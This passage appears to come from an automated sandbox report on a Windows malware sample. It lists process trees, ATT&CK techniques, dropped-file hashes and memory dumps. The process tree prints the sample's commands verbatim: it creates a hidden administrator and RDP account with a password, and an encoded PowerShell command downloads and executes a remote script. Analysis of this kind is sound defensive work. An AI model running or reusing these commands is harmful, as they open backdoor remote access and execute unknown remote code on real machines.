        
        PID:5028
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1148
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:4892
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:2348

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:4968
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4396
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:4312

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc u5aROi0y /add
1⤵
- Suspicious use of WriteProcessMemory
PID:3668
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc u5aROi0y /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3868
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc u5aROi0y /add
    3⤵
    PID:3180

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:4808
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:556
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:2204

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" MUEOAWXB$ /ADD
1⤵
PID:2796
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" MUEOAWXB$ /ADD
  2⤵
  PID:4024
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MUEOAWXB$ /ADD
    3⤵
    PID:3928

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:5052
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:5012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:5036

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc u5aROi0y
1⤵
PID:2200
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc u5aROi0y
  2⤵
  PID:4696
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc u5aROi0y
    3⤵
    PID:3228

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:3940
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:1688

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2364
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4844

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1724
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2228

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESAB53.tmp

Filesize
1KB

MD5
b1cd60876f4fcbe09181924dfb2a6fd2

SHA1
3400d5ba4aafd6e98a979ee6b860ddd0c6f2c852

SHA256
382982be7458fe044ecffdce1646debccc0ba0be5dd151fe4d07081a814bf127

SHA512
efe62a98ff28251fc64d6a029b275475907dfef509326e0757923b7c96355c88b52b70ce58da1e0877bd151f9ed6be35a916f3011e671bad99b08858359c5f00

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_baupiqcw.s3h.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dcjzwavs\dcjzwavs.dll

Filesize
3KB

MD5
12ce731ec3dfa43cde47c9bec0759759

SHA1
be06dfa9efdd64b006887839d5b01cbb5ae5db84

SHA256
4864d2a72a31d53b568707e19028f4bf46f205c84936cdd2ec00a69a4d0dc4cd

SHA512
d7d83b92b6bc85c4a1e0b9051d22be5b41219ac1b9aa08fce5927b5b822e765595d635b6d2ab744790c33d0c8213c8c7e935c27623cf5045c36553643530406f

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

Filesize
2.5MB

MD5
f49b7639c86923a9507b594feb5df523

SHA1
e3a058aa2ae06ee0d8e1c3d47d790181651744a1

SHA256
f92f29a5e41c25e32ad83a71e9e2a54c87f91c966cb90fdd3b1289bad824b021

SHA512
c68858888ea64affa95b3e51e3d3ef43d12e8628f5a09fdb5f33319f1cb5a23df9506a2dfb797445f77cf7120e79f9d0c9ddd25a567dab81cce0c3751903c804

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
28d9755addec05c0b24cca50dfe3a92b

SHA1
7d3156f11c7a7fb60d29809caf93101de2681aa3

SHA256
abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

SHA512
891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
5410b592605e57a4a01c66b0a1f0d10d

SHA1
afa4acf032d537dd46e997891fc7f9bba9555679

SHA256
e39445c5f61c431be3b0ce753487e9a6439b5bfb813cf21116b77fb7d0696fa9

SHA512
4ce9816c61e58834c1713d0abcf6305d565b7a52c1d2d2f63d8b7c5b69314d959205ea70af084ef74759820114c8b938800513e0dda43d699f0454189b5fbdca

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
37b7b51385d6b857d082976c035c86e0

SHA1
c2ec7d74e7d555375cdcca0407237dd3e7db2a24

SHA256
a66a31069c3d37207c33b0dc1a9a0d1bbe85a0dd78168f598edfebe07c3d4e22

SHA512
8bc897adf02406478a4bc6a24efcfcd699e2fa7aa7e82c8bd6d05f6b5922143866039d533ae8730dbd0d76c7745cbda86d4c4174a298bf29be1a80c7a1eaf403

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGID9C6.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dcjzwavs\CSC660E0514DB234634B9F1EB3B5D551086.TMP

Filesize
652B

MD5
73762d30df60c371bfc277e68c209a74

SHA1
baf052b33df7cd38ebdfb9c0faa768384dd7426b

SHA256
095ad8fc1809e3b2c48e11e68dc16231f9e2f835f31c860cb095c144dea6cb6b

SHA512
ec4fb99f26285209cc687aa97c47159b0bf3c299a2631d011c40745c3b54701ba220f0a42f158e431c5b6295f3f014210de1978222737dac80fa6f7f7733dd57

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dcjzwavs\dcjzwavs.0.cs

Filesize
424B

MD5
9f8ab7eb0ab21443a2fe06dab341510e

SHA1
2b88b3116a79e48bab7114e18c9b9674e8a52165

SHA256
e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

SHA512
53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dcjzwavs\dcjzwavs.cmdline

Filesize
369B

MD5
171b47ebb5227de44da9a915c0f2d478

SHA1
564da2fbd1eec3a328223330a337edd0dc9e277c

SHA256
184c14ac36b13889f27a154e820279ba265fbf94246d676ca06025f7a0e882d5

SHA512
803ae83fe11e1e26a24bfe9fc6e622f4e69afabf149ce67832c2ee891dca8d4bc81e6788dbb4f73687521d4ffb998df55c6954386a40fd65eb823fd06b190f86

Download Submit
memory/1104-20-0x00007FFF82BD0000-0x00007FFF83691000-memory.dmp

Filesize
10.8MB

Download
memory/1104-132-0x00007FFF82BD0000-0x00007FFF83691000-memory.dmp

Filesize
10.8MB

Download
memory/1104-26-0x00007FFF82BD0000-0x00007FFF83691000-memory.dmp

Filesize
10.8MB

Download
memory/1104-19-0x00007FFF82BD0000-0x00007FFF83691000-memory.dmp

Filesize
10.8MB

Download
memory/1104-129-0x00007FFF82BD0000-0x00007FFF83691000-memory.dmp

Filesize
10.8MB

Download
memory/1104-18-0x00007FFF82BD0000-0x00007FFF83691000-memory.dmp

Filesize
10.8MB

Download
memory/1104-35-0x0000023E5BAC0000-0x0000023E5BAC8000-memory.dmp

Filesize
32KB

Download
memory/1104-13-0x0000023E5BA30000-0x0000023E5BA52000-memory.dmp

Filesize
136KB

Download
memory/1104-38-0x0000023E742F0000-0x0000023E74466000-memory.dmp

Filesize
1.5MB

Download
memory/1104-39-0x0000023E74680000-0x0000023E7488A000-memory.dmp

Filesize
2.0MB

Download
memory/4768-2-0x00007FFF82BD0000-0x00007FFF83691000-memory.dmp

Filesize
10.8MB

Download
memory/4768-1-0x000001D019820000-0x000001D019C24000-memory.dmp

Filesize
4.0MB

Download
memory/4768-0-0x00007FFF82BD3000-0x00007FFF82BD5000-memory.dmp

Filesize
8KB

Download
memory/4768-84-0x00007FFF82BD3000-0x00007FFF82BD5000-memory.dmp

Filesize
8KB

Download
memory/4768-3-0x00007FFF82BD0000-0x00007FFF83691000-memory.dmp

Filesize
10.8MB

Download
memory/4768-124-0x00007FFF82BD0000-0x00007FFF83691000-memory.dmp

Filesize
10.8MB

Download
memory/4768-128-0x00007FFF82BD0000-0x00007FFF83691000-memory.dmp

Filesize
10.8MB

Download
memory/4768-4-0x00007FFF82BD0000-0x00007FFF83691000-memory.dmp

Filesize
10.8MB

Download
memory/4768-5-0x00007FFF82BD0000-0x00007FFF83691000-memory.dmp

Filesize
10.8MB

Download
memory/4768-134-0x00007FFF82BD0000-0x00007FFF83691000-memory.dmp

Filesize
10.8MB

Download